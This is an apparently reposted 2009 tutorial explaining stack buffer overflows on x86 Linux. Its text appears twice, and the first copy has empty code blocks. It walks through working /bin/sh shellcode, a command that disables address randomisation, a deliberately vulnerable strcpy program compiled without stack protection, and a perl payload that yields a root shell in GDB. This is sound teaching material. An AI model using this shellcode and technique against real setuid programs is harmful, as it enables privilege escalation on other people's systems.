Buffer Overflows Explained [Rev. A - 4/12/09] By: deLusion`
Programmers always need to be careful when writing applications for the security of their software. Every application is vulnerable in some form, and code is always looked over. Buffer overflows are one of the most popular attacks on any application, due to the increased chance of this vulnerability being overlooked in the author’s code. Along with being popular, buffer overflow attacks are very dangerous in a system security aspect. Attackers exploiting the vulnerability can execute arbitrary code aimed to gain root privileges to the system.
Buffers, also called arrays in C/C++, are contiguous blocks of memory for storing a specific data type. An example of a buffer is shown here:
CODE
A storage type of char is assigned to the newly declared array called referred to as buffer, now has 512 bytes of allocated storage space. However, there is an issue that can arise when a buffer reaches and leaps over it's specified storage limit unchecked. This problem is what we call a buffer overflow, when blocks of memory are overwritten as a result of passing space limits. In a *nix environment, as a buffer overflow occurs we are confronted with something known as a segmentation fault, segfault for short. Segmentation faults occur when an application tries to overwrite system memory in an incorrect fashion, possibly to locations that are read-only. On a Windows OS, these errors are displayed differently with a STATUS_ACCESS_VIOLATION exception.
The most important thing to remember about buffer overflow vulnerabilities are that when successfully exploited followed by the spawn of a shell, the shell can only take the permission level of the application that was exploited. Basically, the only way to obtain root authentication on a system through a buffer overflow vulnerability is if the application being exploited is run by the root account, such as a system service. The main part to exploiting a buffer overflow vulnerability successfully is the code to be executed, also known as shellcode, or opcode. Opcodes, short for operation codes, are specific instructions to the processor, usually in machine code format. For simplicities' sake, I will not be showing you how to create your own shellcode from scratch, at least not in this specific article. I will be using sample shellcode provided by milw0rm for a simple shell spawn.
Machine code is system dependent, meaning that this shellcode is only designed to work with *nix x86 environments. If the provided shellcode doesn't work for you, take a look around on milw0rm, or any site that provides shellcode matching your system architecture.
CODE
The 22 byte shellcode presented is a set of instructions to execute a shell on the system. As said before, the shell that is spawned only gains the permissions that the application is currently running on.
The second most important part of a successful exploitation is the NOP sled. NOP’s are a machine instruction which stands for No-OPeration, all of which are skipped over by the processor until the next set of instructions are reached, basically like a stream following in one direction towards the bigger water source, or the rest of the instructions to be given. NOP’s take the form of the “\x90” hexadecimally represented opcode, and are usually required for buffer overflow exploitations. A grouping of NOP’s used in a buffer overflow attack is called a NOP sled, the name relating to the flow of the application. If a return address is set to any of the NOP’s in the group, the program flows downward until it reaches something else to execute.
An exception to the NOP sled requirement is through the usage of environment variables. System wide environment variables can be viewed through the env command. The difference of the shellcode and filename can then be calculated to find the exact location of the shellcode stored in the specified environment variable. However, this method will not be showed in detail by this article.
Last but not least, garbage data and a correct return address are required to complete a buffer overflow exploit. Garbage data is any sort of data to fill the rest of the buffer, it doesn't matter what it is as long as it is not a null byte, thus ending the string. A return address is used by the Instruction Pointer register, also known as the EIP. The EIP tells the processor which memory address to begin execution next, When a buffer is overflowed, the 4 byte EIP is written over by some of the garbage data. The EIP always points to the next instruction to be executed, which is very rewarding for us; now that we have the power to overwrite it.
Before we start, we need to change a security setting in Linux, which randomizes address space. This setting is required to be changed for basic buffer overflows, more advanced overflows can get around this safety precaution. In bash, enter the following command:
CODE
That’s all you need to change to make this basic buffer overflow work.
Now that we know how all this works, how about we put it to good use? Let’s use this piece of vulnerable code just as an example:
vuln.c
CODE
Note, if you are using Ubuntu as your OS, when compiling you must use these arguments for GCC:
CODE
The first disables stack protection, the second allows the stack to be executed.
This code is not too complicated, I’m only going to stay basic with this article. In this example we have a 1024 byte buffer, with the very insecure copy() function shown above. This function uses the strcpy() function included in the string.h header, which if gone unchecked, will forcibly copy any size string from source to destination. As you have probably figured, this is not good at all, allowing anyone to overflow the buffer array. Let's get started with this simple vulnerability.
Here is the format in which you need to sort your shellcode, garbage data, and return address:
CODE
We now need to calculate the amount needed for each field, excluding the return address which is always 4 bytes.
Our buffer size is 1024 bytes, so we need to find out how much garbage data we’re going to need. Just for safe measure we’re going to use 150 NOP’s, so if we are off on the return address, we have a higher chance of hitting the sled.
1024 - 150 = 874
The example shellcode is 22 bytes.
874 - 22 = 852
The EIP needs to be overwritten so we are going to add 4 bytes.
852 + 4 = 856
Before we get started writing statements to exploit this application, I want to point this out:
CODE
The owner of the file is root, so this application will be running with root privileges, simulating the effect of a real-world service being attacked by a buffer overflow exploit.
Moving onto the actual exploitation, we now know how much garbage data we’re going to use to fill most of the buffer. Let’s write a quick perl statement to do this all for us in GDB, standing for the GNU DeBugger.
CODE
Now we’re ready to use GDB to debug this. I set YYYY as the return address temporarily for debugging purposes.
CODE
You might have been able to spot something all ready. 0x59 is hex for Y, which is what has corrupted the EIP. Let’s take a look at the registers.
CODE
Now that wasn’t too hard, was it?
reference:r00tsecurity...
Buffers, also called arrays in C/C++, are contiguous blocks of memory for storing a specific data type. An example of a buffer is shown here:
CODE
char buffer[512];
A storage type of char is assigned to the newly declared array called referred to as buffer, now has 512 bytes of allocated storage space. However, there is an issue that can arise when a buffer reaches and leaps over it's specified storage limit unchecked. This problem is what we call a buffer overflow, when blocks of memory are overwritten as a result of passing space limits. In a *nix environment, as a buffer overflow occurs we are confronted with something known as a segmentation fault, segfault for short. Segmentation faults occur when an application tries to overwrite system memory in an incorrect fashion, possibly to locations that are read-only. On a Windows OS, these errors are displayed differently with a STATUS_ACCESS_VIOLATION exception.
The most important thing to remember about buffer overflow vulnerabilities are that when successfully exploited followed by the spawn of a shell, the shell can only take the permission level of the application that was exploited. Basically, the only way to obtain root authentication on a system through a buffer overflow vulnerability is if the application being exploited is run by the root account, such as a system service. The main part to exploiting a buffer overflow vulnerability successfully is the code to be executed, also known as shellcode, or opcode. Opcodes, short for operation codes, are specific instructions to the processor, usually in machine code format. For simplicities' sake, I will not be showing you how to create your own shellcode from scratch, at least not in this specific article. I will be using sample shellcode provided by milw0rm for a simple shell spawn.
Machine code is system dependent, meaning that this shellcode is only designed to work with *nix x86 environments. If the provided shellcode doesn't work for you, take a look around on milw0rm, or any site that provides shellcode matching your system architecture.
CODE
\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
The 22 byte shellcode presented is a set of instructions to execute a shell on the system. As said before, the shell that is spawned only gains the permissions that the application is currently running on.
The second most important part of a successful exploitation is the NOP sled. NOP’s are a machine instruction which stands for No-OPeration, all of which are skipped over by the processor until the next set of instructions are reached, basically like a stream following in one direction towards the bigger water source, or the rest of the instructions to be given. NOP’s take the form of the “\x90” hexadecimally represented opcode, and are usually required for buffer overflow exploitations. A grouping of NOP’s used in a buffer overflow attack is called a NOP sled, the name relating to the flow of the application. If a return address is set to any of the NOP’s in the group, the program flows downward until it reaches something else to execute.
An exception to the NOP sled requirement is through the usage of environment variables. System wide environment variables can be viewed through the env command. The difference of the shellcode and filename can then be calculated to find the exact location of the shellcode stored in the specified environment variable. However, this method will not be showed in detail by this article.
Last but not least, garbage data and a correct return address are required to complete a buffer overflow exploit. Garbage data is any sort of data to fill the rest of the buffer, it doesn't matter what it is as long as it is not a null byte, thus ending the string. A return address is used by the Instruction Pointer register, also known as the EIP. The EIP tells the processor which memory address to begin execution next, When a buffer is overflowed, the 4 byte EIP is written over by some of the garbage data. The EIP always points to the next instruction to be executed, which is very rewarding for us; now that we have the power to overwrite it.
Before we start, we need to change a security setting in Linux, which randomizes address space. This setting is required to be changed for basic buffer overflows, more advanced overflows can get around this safety precaution. In bash, enter the following command:
CODE
echo 0 > /proc/sys/kernel/randomize_va_space
That’s all you need to change to make this basic buffer overflow work.
Now that we know how all this works, how about we put it to good use? Let’s use this piece of vulnerable code just as an example:
vuln.c
CODE
#include
#include
#include
int copy(char *string){
char buffer[1024];
strcpy(buffer, string);
return 1;
}
int main(int argc, char *argv[]) {
copy(argv[1]);
return 1;
}
Note, if you are using Ubuntu as your OS, when compiling you must use these arguments for GCC:
CODE
-fno-stack-protector -z execstack
The first disables stack protection, the second allows the stack to be executed.
This code is not too complicated, I’m only going to stay basic with this article. In this example we have a 1024 byte buffer, with the very insecure copy() function shown above. This function uses the strcpy() function included in the string.h header, which if gone unchecked, will forcibly copy any size string from source to destination. As you have probably figured, this is not good at all, allowing anyone to overflow the buffer array. Let's get started with this simple vulnerability.
Here is the format in which you need to sort your shellcode, garbage data, and return address:
CODE
[ GARBAGE DATA ] -> [ NOP ] -> [ SHELLCODE ] -> [ RET ]
We now need to calculate the amount needed for each field, excluding the return address which is always 4 bytes.
Our buffer size is 1024 bytes, so we need to find out how much garbage data we’re going to need. Just for safe measure we’re going to use 150 NOP’s, so if we are off on the return address, we have a higher chance of hitting the sled.
1024 - 150 = 874
The example shellcode is 22 bytes.
874 - 22 = 852
The EIP needs to be overwritten so we are going to add 4 bytes.
852 + 4 = 856
Before we get started writing statements to exploit this application, I want to point this out:
CODE
delusion@deLusive:~/code/overflow$ ls -l
total 16
-rwxr-xr-x 1 root root 11997 2009-04-12 13:03 vuln
-rw-r--r-- 1 root root 212 2009-04-12 13:03 vuln.c
The owner of the file is root, so this application will be running with root privileges, simulating the effect of a real-world service being attacked by a buffer overflow exploit.
Moving onto the actual exploitation, we now know how much garbage data we’re going to use to fill most of the buffer. Let’s write a quick perl statement to do this all for us in GDB, standing for the GNU DeBugger.
CODE
perl –e’print “A”x856,”\x90”x150,”\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80”,”YYYY”’
Now we’re ready to use GDB to debug this. I set YYYY as the return address temporarily for debugging purposes.
CODE
delusion@deLusive:~/code/overflow$ gdb vuln -q
(gdb) run `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","YYYY"'`
Starting program: /home/delusion/code/overflow/vuln `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","YYYY"'`
Program received signal SIGSEGV, Segmentation fault.
0x59595959 in ?? ()
You might have been able to spot something all ready. 0x59 is hex for Y, which is what has corrupted the EIP. Let’s take a look at the registers.
CODE
(gdb) i r
eax 0x1 1
ecx 0xbfffeb38 -1073747144
edx 0x409 1033
ebx 0xb7fc1ff4 -1208213516
esp 0xbfffef40 0xbfffef40
ebp 0x80cde189 0x80cde189
esi 0xb8000ce0 -1207956256
edi 0x0 0
eip 0x59595959 0x59595959
As you see, the EIP was overwritten with 4 bytes of ‘Y’, now we need to find out the general location of the NOP sled to get an approximate return address.
CODE
(gdb) x/200xb $esp
……
0xbffff4b8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4c0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4c8: 0x41 0x41 0x41 0x90 0x90 0x90 0x90 0x90
0xbffff4d0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4d8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4e0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4e8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4f0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4f8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff500: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff508: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff510: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff518: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff520: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff528: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff530: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff538: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff540: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff548: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff550: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff558: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff560: 0x90 0xb0 0x0b 0x99 0x52 0x68 0x2f 0x2f
0xbffff568: 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89
0xbffff570: 0xe3 0x52 0x53 0x89 0xe1 0xcd 0x80 0x59
0xbffff578: 0x59 0x59 0x59 0x00 0x43 0x50 0x4c 0x55
Notice where the NOP’s end. The first byte of data after is 0xb0, the beginning of our shellcode. The best thing to do is to get a return address to use towards the middle; I’ll use 0xbffff4f0 for this example. The x86 architecture is in Little-Endian format, which is always a good thing to remember. This means that the least significant bytes are read first, so you need to reverse that memory address. Your return address is now going to be:
CODE
\xf0\xf4\xff\xbf
Now you are all set and ready to go to initiate this attack on the vulnerable application.
CODE
(gdb) run `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\xf0\xf4\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/delusion/code/overflow/vuln `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\xf0\xf4\xff\xbf"'`
Executing new program: /bin/bash
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
sh-3.1# whoami
root
sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),17(au
dio),18(video),19(cdrom),26(tape),83(plugdev)
sh-3.1#
Now that wasn’t too hard, was it?
reference:r00tsecurity...